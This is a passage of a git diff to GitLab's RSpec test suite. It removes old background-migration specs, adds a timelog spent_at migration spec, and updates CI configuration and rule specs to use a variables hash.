Gitlab::BackgroundMigration::ResetMergeStatus do - let(:namespaces) { table(:namespaces) } - let(:projects) { table(:projects) } - let(:namespace) { namespaces.create!(name: 'gitlab', path: 'gitlab-org') } - let(:project) { projects.create!(namespace_id: namespace.id, name: 'foo') } - let(:merge_requests) { table(:merge_requests) } - - def create_merge_request(id, extra_params = {}) - params = { - id: id, - target_project_id: project.id, - target_branch: 'master', - source_project_id: project.id, - source_branch: 'mr name', - title: "mr name#{id}" - }.merge(extra_params) - - merge_requests.create!(params) - end - - it 'correctly updates opened mergeable MRs to unchecked' do - create_merge_request(1, state_id: MergeRequest.available_states[:opened], merge_status: 'can_be_merged') - create_merge_request(2, state_id: MergeRequest.available_states[:opened], merge_status: 'can_be_merged') - create_merge_request(3, state_id: MergeRequest.available_states[:opened], merge_status: 'can_be_merged') - create_merge_request(4, state_id: MergeRequest.available_states[:merged], merge_status: 'can_be_merged') - create_merge_request(5, state_id: MergeRequest.available_states[:opened], merge_status: 'cannot_be_merged') - - subject.perform(1, 5) - - expected_rows = [ - { id: 1, state_id: MergeRequest.available_states[:opened], merge_status: 'unchecked' }, - { id: 2, state_id: MergeRequest.available_states[:opened], merge_status: 'unchecked' }, - { id: 3, state_id: MergeRequest.available_states[:opened], merge_status: 'unchecked' }, - { id: 4, state_id: MergeRequest.available_states[:merged], merge_status: 'can_be_merged' }, - { id: 5, state_id: MergeRequest.available_states[:opened], merge_status: 'cannot_be_merged' } - ] - - rows = merge_requests.order(:id).map do |row| - row.attributes.slice('id', 'state_id', 'merge_status').symbolize_keys - end - - expect(rows).to eq(expected_rows) - end -end diff --git 
a/spec/lib/gitlab/background_migration/reset_shared_runners_for_transferred_projects_spec.rb b/spec/lib/gitlab/background_migration/reset_shared_runners_for_transferred_projects_spec.rb deleted file mode 100644 index ef90b5674f0..00000000000 --- a/spec/lib/gitlab/background_migration/reset_shared_runners_for_transferred_projects_spec.rb +++ /dev/null @@ -1,35 +0,0 @@ -# frozen_string_literal: true - -require 'spec_helper' - -RSpec.describe Gitlab::BackgroundMigration::ResetSharedRunnersForTransferredProjects, schema: 20181228175414 do - let(:namespaces) { table(:namespaces) } - let(:projects) { table(:projects) } - - let(:namespace_1) { namespaces.create!(name: 'foo', path: 'foo', shared_runners_enabled: true, allow_descendants_override_disabled_shared_runners: false ) } - let(:namespace_2) { namespaces.create!(name: 'foo', path: 'foo', shared_runners_enabled: false, allow_descendants_override_disabled_shared_runners: false ) } - let(:namespace_3) { namespaces.create!(name: 'bar', path: 'bar', shared_runners_enabled: false, allow_descendants_override_disabled_shared_runners: true ) } - let(:project_1_1) { projects.create!(namespace_id: namespace_1.id, shared_runners_enabled: true) } - let(:project_1_2) { projects.create!(namespace_id: namespace_1.id, shared_runners_enabled: false) } - let(:project_2_1) { projects.create!(namespace_id: namespace_2.id, shared_runners_enabled: true) } - let(:project_2_2) { projects.create!(namespace_id: namespace_2.id, shared_runners_enabled: false) } - let(:project_3_1) { projects.create!(namespace_id: namespace_3.id, shared_runners_enabled: true) } - let(:project_3_2) { projects.create!(namespace_id: namespace_3.id, shared_runners_enabled: false) } - - it 'corrects each project shared_runners_enabled column' do - expect do - described_class.new.perform(namespace_1.id, namespace_3.id) - project_1_1.reload - project_1_2.reload - project_2_1.reload - project_2_2.reload - project_3_1.reload - project_3_2.reload - end.to 
not_change(project_1_1, :shared_runners_enabled).from(true) - .and not_change(project_1_2, :shared_runners_enabled).from(false) - .and change(project_2_1, :shared_runners_enabled).from(true).to(false) - .and not_change(project_2_2, :shared_runners_enabled).from(false) - .and not_change(project_3_1, :shared_runners_enabled).from(true) - .and not_change(project_3_2, :shared_runners_enabled).from(false) - end -end diff --git a/spec/lib/gitlab/background_migration/set_merge_request_diff_files_count_spec.rb b/spec/lib/gitlab/background_migration/set_merge_request_diff_files_count_spec.rb deleted file mode 100644 index 1fdbdf25706..00000000000 --- a/spec/lib/gitlab/background_migration/set_merge_request_diff_files_count_spec.rb +++ /dev/null @@ -1,51 +0,0 @@ -# frozen_string_literal: true - -require 'spec_helper' - -RSpec.describe Gitlab::BackgroundMigration::SetMergeRequestDiffFilesCount, schema: 20181228175414 do - let(:merge_request_diff_files) { table(:merge_request_diff_files) } - let(:merge_request_diffs) { table(:merge_request_diffs) } - let(:merge_requests) { table(:merge_requests) } - let(:namespaces) { table(:namespaces) } - let(:projects) { table(:projects) } - - let(:namespace) { namespaces.create!(name: 'foo', path: 'foo') } - let(:project) { projects.create!(namespace_id: namespace.id) } - let(:merge_request) { merge_requests.create!(source_branch: 'x', target_branch: 'master', target_project_id: project.id) } - - let!(:empty_diff) { merge_request_diffs.create!(merge_request_id: merge_request.id) } - let!(:filled_diff) { merge_request_diffs.create!(merge_request_id: merge_request.id) } - - let!(:filled_diff_files) do - 1.upto(3).map do |n| - merge_request_diff_files.create!( - merge_request_diff_id: filled_diff.id, - relative_order: n, - new_file: false, - renamed_file: false, - deleted_file: false, - too_large: false, - a_mode: '', - b_mode: '', - old_path: '', - new_path: '' - ) - end - end - - it 'fills the files_count column' do - 
described_class.new.perform(empty_diff.id, filled_diff.id) - - expect(empty_diff.reload.files_count).to eq(0) - expect(filled_diff.reload.files_count).to eq(3) - end - - it 'uses the sentinel value if the actual count is too high' do - stub_const("#{described_class}::FILES_COUNT_SENTINEL", filled_diff_files.size - 1) - - described_class.new.perform(empty_diff.id, filled_diff.id) - - expect(empty_diff.reload.files_count).to eq(0) - expect(filled_diff.reload.files_count).to eq(described_class::FILES_COUNT_SENTINEL) - end -end diff --git a/spec/lib/gitlab/background_migration/update_existing_subgroup_to_match_visibility_level_of_parent_spec.rb b/spec/lib/gitlab/background_migration/update_existing_subgroup_to_match_visibility_level_of_parent_spec.rb deleted file mode 100644 index de9799c3642..00000000000 --- a/spec/lib/gitlab/background_migration/update_existing_subgroup_to_match_visibility_level_of_parent_spec.rb +++ /dev/null @@ -1,46 +0,0 @@ -# frozen_string_literal: true - -require 'spec_helper' - -RSpec.describe Gitlab::BackgroundMigration::UpdateExistingSubgroupToMatchVisibilityLevelOfParent, schema: 20181228175414 do - include MigrationHelpers::NamespacesHelpers - - context 'private visibility level' do - it 'updates the project visibility' do - parent = create_namespace('parent', Gitlab::VisibilityLevel::PRIVATE) - child = create_namespace('child', Gitlab::VisibilityLevel::PUBLIC, parent_id: parent.id) - - expect { subject.perform([parent.id], Gitlab::VisibilityLevel::PRIVATE) }.to change { child.reload.visibility_level }.to(Gitlab::VisibilityLevel::PRIVATE) - end - - it 'updates sub-sub groups' do - parent = create_namespace('parent', Gitlab::VisibilityLevel::PRIVATE) - middle_group = create_namespace('middle', Gitlab::VisibilityLevel::PRIVATE, parent_id: parent.id) - child = create_namespace('child', Gitlab::VisibilityLevel::PUBLIC, parent_id: middle_group.id) - - subject.perform([parent.id, middle_group.id], Gitlab::VisibilityLevel::PRIVATE) - - 
expect(child.reload.visibility_level).to eq(Gitlab::VisibilityLevel::PRIVATE) - end - - it 'updates all sub groups' do - parent = create_namespace('parent', Gitlab::VisibilityLevel::PRIVATE) - middle_group = create_namespace('middle', Gitlab::VisibilityLevel::PUBLIC, parent_id: parent.id) - child = create_namespace('child', Gitlab::VisibilityLevel::PUBLIC, parent_id: middle_group.id) - - subject.perform([parent.id], Gitlab::VisibilityLevel::PRIVATE) - - expect(child.reload.visibility_level).to eq(Gitlab::VisibilityLevel::PRIVATE) - expect(middle_group.reload.visibility_level).to eq(Gitlab::VisibilityLevel::PRIVATE) - end - end - - context 'internal visibility level' do - it 'updates the project visibility' do - parent = create_namespace('parent', Gitlab::VisibilityLevel::INTERNAL) - child = create_namespace('child', Gitlab::VisibilityLevel::PUBLIC, parent_id: parent.id) - - expect { subject.perform([parent.id], Gitlab::VisibilityLevel::INTERNAL) }.to change { child.reload.visibility_level }.to(Gitlab::VisibilityLevel::INTERNAL) - end - end -end diff --git a/spec/lib/gitlab/background_migration/update_existing_users_that_require_two_factor_auth_spec.rb b/spec/lib/gitlab/background_migration/update_existing_users_that_require_two_factor_auth_spec.rb deleted file mode 100644 index 33f5e38100e..00000000000 --- a/spec/lib/gitlab/background_migration/update_existing_users_that_require_two_factor_auth_spec.rb +++ /dev/null @@ -1,74 +0,0 @@ -# frozen_string_literal: true - -require 'spec_helper' - -RSpec.describe Gitlab::BackgroundMigration::UpdateExistingUsersThatRequireTwoFactorAuth, schema: 20181228175414 do - include MigrationHelpers::NamespacesHelpers - - let(:group_with_2fa_parent) { create_namespace('parent', Gitlab::VisibilityLevel::PRIVATE) } - let(:group_with_2fa_child) { create_namespace('child', Gitlab::VisibilityLevel::PRIVATE, parent_id: group_with_2fa_parent.id) } - let(:members_table) { table(:members) } - let(:users_table) { table(:users) } - - subject { 
described_class.new } - - describe '#perform' do - context 'with group members' do - let(:user_1) { create_user('user@example.com') } - let!(:member) { create_group_member(user_1, group_with_2fa_parent) } - let!(:user_without_group) { create_user('user_without@example.com') } - let(:user_other) { create_user('user_other@example.com') } - let!(:member_other) { create_group_member(user_other, group_with_2fa_parent) } - - it 'updates user when user should not be required to establish two factor authentication' do - subject.perform(user_1.id, user_without_group.id) - - expect(user_1.reload.require_two_factor_authentication_from_group).to eq(false) - end - - it 'does not update user when user is member of group that requires two factor authentication' do - group = create_namespace('other', Gitlab::VisibilityLevel::PRIVATE, require_two_factor_authentication: true) - create_group_member(user_1, group) - - subject.perform(user_1.id, user_without_group.id) - - expect(user_1.reload.require_two_factor_authentication_from_group).to eq(true) - end - - it 'does not update user who is not in current batch' do - subject.perform(user_1.id, user_without_group.id) - - expect(user_other.reload.require_two_factor_authentication_from_group).to eq(true) - end - - it 'updates all users in current batch' do - subject.perform(user_1.id, user_other.id) - - expect(user_other.reload.require_two_factor_authentication_from_group).to eq(false) - end - - it 'does not update user when user is member of group which parent group requires two factor authentication' do - group_with_2fa_parent.update!(require_two_factor_authentication: true) - subject.perform(user_1.id, user_other.id) - - expect(user_1.reload.require_two_factor_authentication_from_group).to eq(true) - end - - it 'does not update user when user is member of group which has subgroup that requires two factor authentication' do - create_namespace('subgroup', Gitlab::VisibilityLevel::PRIVATE, require_two_factor_authentication: true, 
parent_id: group_with_2fa_child.id) - - subject.perform(user_1.id, user_other.id) - - expect(user_1.reload.require_two_factor_authentication_from_group).to eq(true) - end - end - end - - def create_user(email, require_2fa: true) - users_table.create!(email: email, projects_limit: 10, require_two_factor_authentication_from_group: require_2fa) - end - - def create_group_member(user, group) - members_table.create!(user_id: user.id, source_id: group.id, access_level: GroupMember::MAINTAINER, source_type: "Namespace", type: "GroupMember", notification_level: 3) - end -end diff --git a/spec/lib/gitlab/background_migration/update_timelogs_null_spent_at_spec.rb b/spec/lib/gitlab/background_migration/update_timelogs_null_spent_at_spec.rb new file mode 100644 index 00000000000..982e3319063 --- /dev/null +++ b/spec/lib/gitlab/background_migration/update_timelogs_null_spent_at_spec.rb @@ -0,0 +1,40 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe Gitlab::BackgroundMigration::UpdateTimelogsNullSpentAt, schema: 20211215090620 do + let_it_be(:previous_time) { 10.days.ago } + let_it_be(:namespace) { table(:namespaces).create!(name: 'namespace', path: 'namespace') } + let_it_be(:project) { table(:projects).create!(namespace_id: namespace.id) } + let_it_be(:issue) { table(:issues).create!(project_id: project.id) } + let_it_be(:merge_request) { table(:merge_requests).create!(target_project_id: project.id, source_branch: 'master', target_branch: 'feature') } + let_it_be(:timelog1) { create_timelog!(issue_id: issue.id) } + let_it_be(:timelog2) { create_timelog!(merge_request_id: merge_request.id) } + let_it_be(:timelog3) { create_timelog!(issue_id: issue.id, spent_at: previous_time) } + let_it_be(:timelog4) { create_timelog!(merge_request_id: merge_request.id, spent_at: previous_time) } + + subject(:background_migration) { described_class.new } + + before_all do + table(:timelogs).where.not(id: [timelog3.id, timelog4.id]).update_all(spent_at: nil) + end + + 
describe '#perform' do + it 'sets correct spent_at' do + background_migration.perform(timelog1.id, timelog4.id) + + expect(timelog1.reload.spent_at).to be_like_time(timelog1.created_at) + expect(timelog2.reload.spent_at).to be_like_time(timelog2.created_at) + expect(timelog3.reload.spent_at).to be_like_time(previous_time) + expect(timelog4.reload.spent_at).to be_like_time(previous_time) + expect(timelog3.reload.spent_at).not_to be_like_time(timelog3.created_at) + expect(timelog4.reload.spent_at).not_to be_like_time(timelog4.created_at) + end + end + + private + + def create_timelog!(**args) + table(:timelogs).create!(**args, time_spent: 1) + end +end diff --git a/spec/lib/gitlab/background_migration/user_mentions/create_resource_user_mention_spec.rb b/spec/lib/gitlab/background_migration/user_mentions/create_resource_user_mention_spec.rb deleted file mode 100644 index 7af11ffa1e0..00000000000 --- a/spec/lib/gitlab/background_migration/user_mentions/create_resource_user_mention_spec.rb +++ /dev/null @@ -1,15 +0,0 @@ -# frozen_string_literal: true - -require 'spec_helper' - -RSpec.describe Gitlab::BackgroundMigration::UserMentions::CreateResourceUserMention, schema: 20181228175414 do - context 'checks no_quote_columns' do - it 'has correct no_quote_columns' do - expect(Gitlab::BackgroundMigration::UserMentions::Models::MergeRequest.no_quote_columns).to match([:note_id, :merge_request_id]) - end - - it 'commit has correct no_quote_columns' do - expect(Gitlab::BackgroundMigration::UserMentions::Models::Commit.no_quote_columns).to match([:note_id]) - end - end -end diff --git a/spec/lib/gitlab/background_migration_spec.rb b/spec/lib/gitlab/background_migration_spec.rb index 777dc8112a7..8dd7f6892a6 100644 --- a/spec/lib/gitlab/background_migration_spec.rb +++ b/spec/lib/gitlab/background_migration_spec.rb @@ -3,11 +3,12 @@ require 'spec_helper' RSpec.describe Gitlab::BackgroundMigration do - let(:coordinator) { described_class::JobCoordinator.for_database(:main) } + 
let(:default_tracking_database) { described_class::DEFAULT_TRACKING_DATABASE } + let(:coordinator) { described_class::JobCoordinator.for_tracking_database(default_tracking_database) } before do allow(described_class).to receive(:coordinator_for_database) - .with(:main) + .with(default_tracking_database) .and_return(coordinator) end diff --git a/spec/lib/gitlab/bitbucket_server_import/importer_spec.rb b/spec/lib/gitlab/bitbucket_server_import/importer_spec.rb index f9313f0ff28..0380ddd9a2e 100644 --- a/spec/lib/gitlab/bitbucket_server_import/importer_spec.rb +++ b/spec/lib/gitlab/bitbucket_server_import/importer_spec.rb @@ -27,20 +27,26 @@ RSpec.describe Gitlab::BitbucketServerImport::Importer do end describe '#import_repository' do + let(:repo_url) { 'http://bitbucket:test@my-bitbucket' } + + before do + expect(project.repository).to receive(:import_repository).with(repo_url) + end + it 'adds a remote' do expect(subject).to receive(:import_pull_requests) expect(subject).to receive(:delete_temp_branches) expect(project.repository).to receive(:fetch_as_mirror) - .with('http://bitbucket:test@my-bitbucket', - refmap: [:heads, :tags, '+refs/pull-requests/*/to:refs/merge-requests/*/head']) + .with(repo_url, + refmap: ['+refs/pull-requests/*/to:refs/merge-requests/*/head']) subject.execute end - it 'raises a Gitlab::Shell exception in the fetch' do - expect(project.repository).to receive(:fetch_as_mirror).and_raise(Gitlab::Shell::Error) + it 'raises a Gitlab::Git::CommandError in the fetch' do + expect(project.repository).to receive(:fetch_as_mirror).and_raise(::Gitlab::Git::CommandError) - expect { subject.execute }.to raise_error(Gitlab::Shell::Error) + expect { subject.execute }.to raise_error(::Gitlab::Git::CommandError) end it 'raises an unhandled exception in the fetch' do diff --git a/spec/lib/gitlab/ci/build/context/build_spec.rb b/spec/lib/gitlab/ci/build/context/build_spec.rb index 46447231424..7f862a3b80a 100644 --- 
a/spec/lib/gitlab/ci/build/context/build_spec.rb +++ b/spec/lib/gitlab/ci/build/context/build_spec.rb @@ -8,11 +8,7 @@ RSpec.describe Gitlab::Ci::Build::Context::Build do let(:context) { described_class.new(pipeline, seed_attributes) } - describe '#variables' do - subject { context.variables.to_hash } - - it { expect(context.variables).to be_instance_of(Gitlab::Ci::Variables::Collection) } - + shared_examples 'variables collection' do it { is_expected.to include('CI_COMMIT_REF_NAME' => 'master') } it { is_expected.to include('CI_PIPELINE_IID' => pipeline.iid.to_s) } it { is_expected.to include('CI_PROJECT_PATH' => pipeline.project.full_path) } @@ -27,4 +23,20 @@ RSpec.describe Gitlab::Ci::Build::Context::Build do it { is_expected.to include('CI_PROJECT_PATH' => pipeline.project.full_path) } end end + + describe '#variables' do + subject { context.variables.to_hash } + + it { expect(context.variables).to be_instance_of(Gitlab::Ci::Variables::Collection) } + + it_behaves_like 'variables collection' + end + + describe '#variables_hash' do + subject { context.variables_hash } + + it { expect(context.variables_hash).to be_instance_of(ActiveSupport::HashWithIndifferentAccess) } + + it_behaves_like 'variables collection' + end end diff --git a/spec/lib/gitlab/ci/build/context/global_spec.rb b/spec/lib/gitlab/ci/build/context/global_spec.rb index 61f2b90426d..d4141eb8389 100644 --- a/spec/lib/gitlab/ci/build/context/global_spec.rb +++ b/spec/lib/gitlab/ci/build/context/global_spec.rb @@ -8,11 +8,7 @@ RSpec.describe Gitlab::Ci::Build::Context::Global do let(:context) { described_class.new(pipeline, yaml_variables: yaml_variables) } - describe '#variables' do - subject { context.variables.to_hash } - - it { expect(context.variables).to be_instance_of(Gitlab::Ci::Variables::Collection) } - + shared_examples 'variables collection' do it { is_expected.to include('CI_COMMIT_REF_NAME' => 'master') } it { is_expected.to include('CI_PIPELINE_IID' => pipeline.iid.to_s) } it { 
is_expected.to include('CI_PROJECT_PATH' => pipeline.project.full_path) } @@ -26,4 +22,20 @@ RSpec.describe Gitlab::Ci::Build::Context::Global do it { is_expected.to include('SUPPORTED' => 'parsed') } end end + + describe '#variables' do + subject { context.variables.to_hash } + + it { expect(context.variables).to be_instance_of(Gitlab::Ci::Variables::Collection) } + + it_behaves_like 'variables collection' + end + + describe '#variables_hash' do + subject { context.variables_hash } + + it { is_expected.to be_instance_of(ActiveSupport::HashWithIndifferentAccess) } + + it_behaves_like 'variables collection' + end end diff --git a/spec/lib/gitlab/ci/build/policy/variables_spec.rb b/spec/lib/gitlab/ci/build/policy/variables_spec.rb index 6c8c968dc0c..436ad59bdf7 100644 --- a/spec/lib/gitlab/ci/build/policy/variables_spec.rb +++ b/spec/lib/gitlab/ci/build/policy/variables_spec.rb @@ -16,7 +16,7 @@ RSpec.describe Gitlab::Ci::Build::Policy::Variables do let(:seed) do double('build seed', to_resource: ci_build, - variables: ci_build.scoped_variables + variables_hash: ci_build.scoped_variables.to_hash ) end @@ -91,7 +91,7 @@ RSpec.describe Gitlab::Ci::Build::Policy::Variables do let(:seed) do double('bridge seed', to_resource: bridge, - variables: ci_build.scoped_variables + variables_hash: ci_build.scoped_variables.to_hash ) end diff --git a/spec/lib/gitlab/ci/build/rules/rule/clause/changes_spec.rb b/spec/lib/gitlab/ci/build/rules/rule/clause/changes_spec.rb index d20ea6c9202..532c83f6768 100644 --- a/spec/lib/gitlab/ci/build/rules/rule/clause/changes_spec.rb +++ b/spec/lib/gitlab/ci/build/rules/rule/clause/changes_spec.rb @@ -33,12 +33,12 @@ RSpec.describe Gitlab::Ci::Build::Rules::Rule::Clause::Changes do end context 'when context has the specified variables' do - let(:variables) do - [{ key: "HELM_DIR", value: "helm", public: true }] + let(:variables_hash) do + { 'HELM_DIR' => 'helm' } end before do - allow(context).to receive(:variables).and_return(variables) + 
allow(context).to receive(:variables_hash).and_return(variables_hash) end it { is_expected.to be_truthy } @@ -49,7 +49,7 @@ RSpec.describe Gitlab::Ci::Build::Rules::Rule::Clause::Changes do let(:modified_paths) { ['path/with/$in/it/file.txt'] } before do - allow(context).to receive(:variables).and_return([]) + allow(context).to receive(:variables_hash).and_return({}) end it { is_expected.to be_truthy } diff --git a/spec/lib/gitlab/ci/build/rules/rule_spec.rb b/spec/lib/gitlab/ci/build/rules/rule_spec.rb index 6f3c9278677..f905e229415 100644 --- a/spec/lib/gitlab/ci/build/rules/rule_spec.rb +++ b/spec/lib/gitlab/ci/build/rules/rule_spec.rb @@ -6,7 +6,7 @@ RSpec.describe Gitlab::Ci::Build::Rules::Rule do let(:seed) do double('build seed', to_resource: ci_build, - variables: ci_build.scoped_variables + variables_hash: ci_build.scoped_variables.to_hash ) end diff --git a/spec/lib/gitlab/ci/build/rules_spec.rb b/spec/lib/gitlab/ci/build/rules_spec.rb index 1d5bdf30278..37bfdca4d1d 100644 --- a/spec/lib/gitlab/ci/build/rules_spec.rb +++ b/spec/lib/gitlab/ci/build/rules_spec.rb @@ -3,13 +3,13 @@ require 'spec_helper' RSpec.describe Gitlab::Ci::Build::Rules do - let(:pipeline) { create(:ci_pipeline) } - let(:ci_build) { build(:ci_build, pipeline: pipeline) } + let_it_be(:pipeline) { create(:ci_pipeline) } + let_it_be(:ci_build) { build(:ci_build, pipeline: pipeline) } let(:seed) do double('build seed', to_resource: ci_build, - variables: ci_build.scoped_variables + variables_hash: ci_build.scoped_variables.to_hash ) end diff --git a/spec/lib/gitlab/ci/config/entry/bridge_spec.rb b/spec/lib/gitlab/ci/config/entry/bridge_spec.rb index 6c9c8fa5df5..62feed3dda0 100644 --- a/spec/lib/gitlab/ci/config/entry/bridge_spec.rb +++ b/spec/lib/gitlab/ci/config/entry/bridge_spec.rb @@ -163,7 +163,7 @@ RSpec.describe Gitlab::Ci::Config::Entry::Bridge do }) end - it { is_expected.not_to be_valid } + it { is_expected.to be_valid } end context 'when bridge configuration uses rules with 
only' do diff --git a/spec/lib/gitlab/ci/config/entry/job_spec.rb b/spec/lib/gitlab/ci/config/entry/job_spec.rb index 0bb26babfc0..885f3eaff79 100644 --- a/spec/lib/gitlab/ci/config/entry/job_spec.rb +++ b/spec/lib/gitlab/ci/config/entry/job_spec.rb @@ -118,6 +118,20 @@ RSpec.describe Gitlab::Ci::Config::Entry::Job do end end + context 'when config uses both "when:" and "rules:"' do + let(:config) do + { + script: 'echo', + when: 'on_failure', + rules: [{ if: '$VARIABLE', when: 'on_success' }] + } + end + + it 'is valid' do + expect(entry).to be_valid + end + end + context 'when delayed job' do context 'when start_in is specified' do let(:config) { { script: 'echo', when: 'delayed', start_in: '1 week' } } @@ -268,21 +282,6 @@ RSpec.describe Gitlab::Ci::Config::Entry::Job do end end - context 'when it uses both "when:" and "rules:"' do - let(:config) do - { - script: 'echo', - when: 'on_failure', - rules: [{ if: '$VARIABLE', when: 'on_success' }] - } - end - - it 'returns an error about when: being combined with rules' do - expect(entry).not_to be_valid - expect(entry.errors).to include 'job config key may not be used with `rules`: when' - end - end - context 'when delayed job' do context 'when start_in is specified' do let(:config) { { script: 'echo', when: 'delayed', start_in: '1 week' } } diff --git a/spec/lib/gitlab/ci/config/entry/processable_spec.rb b/spec/lib/gitlab/ci/config/entry/processable_spec.rb index c9c28e2eb8b..5b9337ede34 100644 --- a/spec/lib/gitlab/ci/config/entry/processable_spec.rb +++ b/spec/lib/gitlab/ci/config/entry/processable_spec.rb @@ -33,6 +33,20 @@ RSpec.describe Gitlab::Ci::Config::Entry::Processable do end end + context 'when config uses both "when:" and "rules:"' do + let(:config) do + { + script: 'echo', + when: 'on_failure', + rules: [{ if: '$VARIABLE', when: 'on_success' }] + } + end + + it 'is valid' do + expect(entry).to be_valid + end + end + context 'when job name is more than 255' do let(:entry) { node_class.new(config, name: 
('a' * 256).to_sym) } @@ -90,21 +104,6 @@ RSpec.describe Gitlab::Ci::Config::Entry::Processable do end end - context 'when it uses both "when:" and "rules:"' do - let(:config) do - { - script: 'echo', - when: 'on_failure', - rules: [{ if: '$VARIABLE', when: 'on_success' }] - } - end - - it 'returns an error about when: being combined with rules' do - expect(entry).not_to be_valid - expect(entry.errors).to include 'job config key may not be used with `rules`: when' - end - end - context 'when only: is used with rules:' do let(:config) { { only: ['merge_requests'], rules: [{ if: '$THIS' }] } } diff --git a/spec/lib/gitlab/ci/config/entry/tags_spec.rb b/spec/lib/gitlab/ci/config/entry/tags_spec.rb index 79317de373b..e05d4ae52b2 100644 --- a/spec/lib/gitlab/ci/config/entry/tags_spec.rb +++ b/spec/lib/gitlab/ci/config/entry/tags_spec.rb @@ -36,25 +36,9 @@ RSpec.describe Gitlab::Ci::Config::Entry::Tags do context 'when tags limit is reached' do let(:config) { Array.new(50) {|i| "tag-#{i}" } } - context 'when ci_build_tags_limit is enabled' do - before do - stub_feature_flags(ci_build_tags_limit: true) - end - - it 'reports error' do - expect(entry.errors) - .to include "tags config must be less than the limit of #{described_class::TAGS_LIMIT} tags" - end - end - - context 'when ci_build_tags_limit is disabled' do - before do - stub_feature_flags(ci_build_tags_limit: false) - end - - it 'does not report an error' do - expect(entry.errors).to be_empty - end + it 'reports error' do + expect(entry.errors) + .to include "tags config must be less than the limit of #{described_class::TAGS_LIMIT} tags" end end end diff --git a/spec/lib/gitlab/ci/config/external/context_spec.rb b/spec/lib/gitlab/ci/config/external/context_spec.rb index 4b9adf7e87b..800c563cd0b 100644 --- a/spec/lib/gitlab/ci/config/external/context_spec.rb +++ b/spec/lib/gitlab/ci/config/external/context_spec.rb @@ -6,7 +6,8 @@ RSpec.describe Gitlab::Ci::Config::External::Context do let(:project) { 
double('Project') } let(:user) { double('User') } let(:sha) { '12345' } - let(:attributes) { { project: project, user: user, sha: sha } } + let(:variables) { Gitlab::Ci::Variables::Collection.new([{ 'key' => 'a', 'value' => 'b' }]) } + let(:attributes) { { project: project, user: user, sha: sha, variables: variables } } subject(:subject) { described_class.new(**attributes) } @@ -15,6 +16,9 @@ RSpec.describe Gitlab::Ci::Config::External::Context do it { is_expected.to have_attributes(**attributes) } it { expect(subject.expandset).to eq(Set.new) } it { expect(subject.execution_deadline).to eq(0) } + it { expect(subject.variables).to be_instance_of(Gitlab::Ci::Variables::Collection) } + it { expect(subject.variables_hash).to be_instance_of(ActiveSupport::HashWithIndifferentAccess) } + it { expect(subject.variables_hash).to include('a' => 'b') } end context 'without values' do @@ -23,6 +27,8 @@ RSpec.describe Gitlab::Ci::Config::External::Context do it { is_expected.to have_attributes(**attributes) } it { expect(subject.expandset).to eq(Set.new) } it { expect(subject.execution_deadline).to eq(0) } + it { expect(subject.variables).to be_instance_of(Gitlab::Ci::Variables::Collection) } + it { expect(subject.variables_hash).to be_instance_of(ActiveSupport::HashWithIndifferentAccess) } end end @@ -94,6 +100,15 @@ RSpec.describe Gitlab::Ci::Config::External::Context do end describe '#mutate' do + let(:attributes) do + { + project: project, + user: user, + sha: sha, + logger: double('logger') + } + end + shared_examples 'a mutated context' do let(:mutated) { subject.mutate(new_attributes) } @@ -107,6 +122,7 @@ RSpec.describe Gitlab::Ci::Config::External::Context do it { expect(mutated).to have_attributes(new_attributes) } it { expect(mutated.expandset).to eq(subject.expandset) } it { expect(mutated.execution_deadline).to eq(mutated.execution_deadline) } + it { expect(mutated.logger).to eq(mutated.logger) } end context 'with attributes' do diff --git 
a/spec/lib/gitlab/ci/config/external/processor_spec.rb b/spec/lib/gitlab/ci/config/external/processor_spec.rb index 2e9e6f95071..97bd74721f2 100644 --- a/spec/lib/gitlab/ci/config/external/processor_spec.rb +++ b/spec/lib/gitlab/ci/config/external/processor_spec.rb @@ -6,7 +6,7 @@ RSpec.describe Gitlab::Ci::Config::External::Processor do include StubRequests let_it_be(:project) { create(:project, :repository) } - let_it_be(:another_project) { create(:project, :repository) } + let_it_be_with_reload(:another_project) { create(:project, :repository) } let_it_be(:user) { create(:user) } let(:sha) { '12345' } @@ -251,6 +251,17 @@ RSpec.describe Gitlab::Ci::Config::External::Processor do it 'properly expands all includes' do is_expected.to include(:my_build, :remote_build, :rspec) end + + it 'propagates the pipeline logger' do + processor.perform + + process_obs_count = processor + .logger + .observations_hash + .dig('config_mapper_process_duration_s', 'count') + + expect(process_obs_count).to eq(3) + end end context 'when user is reporter of another project' do diff --git a/spec/lib/gitlab/ci/config/external/rules_spec.rb b/spec/lib/gitlab/ci/config/external/rules_spec.rb index 1e42cb30ae7..091bd3b07e6 100644 --- a/spec/lib/gitlab/ci/config/external/rules_spec.rb +++ b/spec/lib/gitlab/ci/config/external/rules_spec.rb @@ -8,7 +8,7 @@ RSpec.describe Gitlab::Ci::Config::External::Rules do subject(:rules) { described_class.new(rule_hashes) } describe '#evaluate' do - let(:context) { double(variables: {}) } + let(:context) { double(variables_hash: {}) } subject(:result) { rules.evaluate(context).pass? 
} @@ -20,13 +20,13 @@ RSpec.describe Gitlab::Ci::Config::External::Rules do let(:rule_hashes) { [{ if: '$MY_VAR == "hello"' }] } context 'when the rule matches' do - let(:context) { double(variables: { MY_VAR: 'hello' }) } + let(:context) { double(variables_hash: { 'MY_VAR' => 'hello' }) } it { is_expected.to eq(true) } end context 'when the rule does not match' do - let(:context) { double(variables: { MY_VAR: 'invalid' }) } + let(:context) { double(variables_hash: { 'MY_VAR' => 'invalid' }) } it { is_expected.to eq(false) } end diff --git a/spec/lib/gitlab/ci/parsers/terraform/tfplan_spec.rb b/spec/lib/gitlab/ci/parsers/terraform/tfplan_spec.rb index f487fccdab7..60b4e01f382 100644 --- a/spec/lib/gitlab/ci/parsers/terraform/tfplan_spec.rb +++ b/spec/lib/gitlab/ci/parsers/terraform/tfplan_spec.rb @@ -103,7 +103,7 @@ RSpec.describe Gitlab::Ci::Parsers::Terraform::Tfplan do 'create' => 0, 'update' => 1, 'delete' => 0, - 'job_name' => artifact.job.options.dig(:artifacts, :name).to_s + 'job_name' => artifact.job.name ) ) ) @@ -124,7 +124,7 @@ RSpec.describe Gitlab::Ci::Parsers::Terraform::Tfplan do 'create' => 0, 'update' => 1, 'delete' => 0, - 'job_name' => artifact.job.options.dig(:artifacts, :name).to_s + 'job_name' => artifact.job.name ) ) ) diff --git a/spec/lib/gitlab/ci/pipeline/chain/create_deployments_spec.rb b/spec/lib/gitlab/ci/pipeline/chain/create_deployments_spec.rb new file mode 100644 index 00000000000..28bc685286f --- /dev/null +++ b/spec/lib/gitlab/ci/pipeline/chain/create_deployments_spec.rb @@ -0,0 +1,97 @@ +# frozen_string_literal: true + +require 